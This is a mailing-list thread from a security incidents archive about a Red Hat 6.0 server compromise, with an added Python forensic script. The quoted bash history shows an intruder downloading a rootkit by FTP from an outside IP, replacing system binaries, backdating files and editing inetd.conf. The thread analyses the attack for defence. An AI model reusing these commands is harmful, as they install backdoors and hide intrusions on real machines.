Security Incidents mailing list archives
Re: Rooted through in.identd on Red Hat 6.0
From: sec () ORGONE NEGATION NET (jms)
Date: Thu, 20 Apr 2000 00:31:46 -0700
What other services were running? I'm more inclined to think they gained entry through other means, trojaned the box, then came in again to clean up the logs and forgot to nuke the .bash_history. The in.identd entries are explained by his ftp session, which was probably to get the rootkit:

    ftp 200.192.58.201 21                                  <-- from .bash_history
        ^^^^^^^^^^^^^^
    Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
                                                       ^^^^^^^^^^^^^^
    ..from syslogs.

Supply a list of daemons running at the time of the break-in; I suspect we will see something known to be rootable.

-jason storm
jms () negation net

/* hard work never killed nobody, but i aint takin no chances. */
Hi,

A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box. RH doesn't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which ran like:

    mkdir /usr/lib/... ; cd /usr/lib/...
    ftp 200.192.58.201 21
    cd /usr/lib/...
    mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz
    gzip -d *
    chmod +x *
    mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07
    echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ; echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
    touch -t 199910122110 /dev/cui220
    touch -t 199910122110 /dev/cui221
    touch -t 199910122110 /usr/lib/pt07
    touch -t 199910122110 /usr/sbin/syslogd
    touch -t 199910122110 /usr/sbin/tcpd
    touch -t 199910122110 /bin/ps
    touch -t 199910122110 /bin/netstat
    touch -t 199910122110 /usr/bin/pstree
    cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
    mv /tmp/b /etc/inetd.conf
    killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time were:

    Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
    Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
    Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
    Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or patches for in.identd?

Del
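An added example, not from either poster, that works through Jason's reading of the evidence: pidentd logs each lookup as "for: <local port>, <remote port>", so a lookup for (1176, 21) records an outbound FTP connection from this host that the remote server asked about, which lines up with the "ftp 200.192.58.201 21" command in the history. The script also pulls the replaced system binaries and the backdated files out of the quoted history, as a checklist for verifying the box against clean package checksums. The sample log and history fragments are constructed from the lines quoted in the thread.

```python
import re
from os.path import basename
# Constructed sample input: the syslog and .bash_history fragments quoted in this thread.
IDENTD_LOG = """\
Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
"""
BASH_HISTORY = """\
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /bin/ps
"""
# pidentd logs "for: <local port>, <remote port>" for each lookup it answers.
IDENTD_RE = re.compile(r"identd\[\d+\]: from: (\S+) .*? for: (\d+), (\d+)")
def identd_lookups(log):
    """Ident lookups this host answered: who asked, and about which connection."""
    return [{"remote": m.group(1), "lport": int(m.group(2)), "rport": int(m.group(3))}
            for m in map(IDENTD_RE.search, log.splitlines()) if m]

def classify_lookups(log, history):
    """(high local port, remote port 21) means THIS host opened an FTP connection and the
    FTP server asked who owned it; tie that to an 'ftp <remote>' line in the history."""
    verdicts = []
    for q in identd_lookups(log):
        if q["rport"] == 21 and q["lport"] > 1023 and f"ftp {q['remote']}" in history:
            verdicts.append(f"outbound ftp to {q['remote']}:21 from port {q['lport']}, "
                            "matches .bash_history: not an inbound attack on identd")
        else:
            verdicts.append(f"unexplained lookup from {q['remote']}: {q['lport']}, {q['rport']}")
    return verdicts

def replaced_binaries(history):
    """Absolute 'mv' destinations: the files to verify against clean package checksums.
    A destination is a directory if it ends with '/' or its basename differs from the source's."""
    found = []
    for cmd in re.split(r"[;\n]", history):
        parts = cmd.split()
        if len(parts) == 3 and parts[0] == "mv" and parts[2].startswith("/"):
            src, dst = parts[1], parts[2]
            if dst.endswith("/") or basename(dst) != basename(src):
                dst = dst.rstrip("/") + "/" + basename(src)
            found.append(dst)
    return found

def backdated_files(history):
    """Files whose mtime was forged with 'touch -t', mapped to the fake timestamp."""
    return {f: ts for ts, f in re.findall(r"touch -t (\d+) (\S+)", history)}
```

Run the same functions over the full history and syslog from the box; anything left as "unexplained" or any replaced binary whose checksum does not match the package is where to dig next.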
Current thread:
- Re: Rooted through in.identd on Red Hat 6.0 jms (Apr 20)
- <Possible follow-ups>
- Re: Rooted through in.identd on Red Hat 6.0 Jon Burdge (Apr 20)